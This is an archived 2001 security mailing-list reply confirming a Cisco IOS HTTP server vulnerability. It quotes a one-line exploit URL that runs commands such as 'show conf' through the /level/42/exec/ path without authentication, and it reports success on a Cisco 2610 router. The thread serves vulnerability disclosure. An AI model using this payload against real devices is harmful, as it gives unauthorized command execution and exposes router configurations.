Re: Cisco device HTTP exploit...

From: Grzegorz Krawczyk (krawiecat_private)
Date: Tue Jul 03 2001 - 00:14:06 PDT

Next message: Laurent Papier: "Re: php breaks safe mode"

Previous message: Marc-Adrian Napoli: "Re: Cisco device HTTP exploit..."
In reply to: Half Adder: "Cisco device HTTP exploit..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> A malicious user could use:
> 
> http://169.254.0.15/level/42/exec/show%20conf
I've tested it on CISCO 2610 router with
IOS (tm) C2600 Software (C2600-I-M), Version 12.0(10), RELEASE SOFTWARE
(fc1)
It work.. You can exec any command..

Krawiec

Next message: Laurent Papier: "Re: php breaks safe mode"
Previous message: Marc-Adrian Napoli: "Re: Cisco device HTTP exploit..."
In reply to: Half Adder: "Cisco device HTTP exploit..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jul 03 2001 - 12:31:48 PDT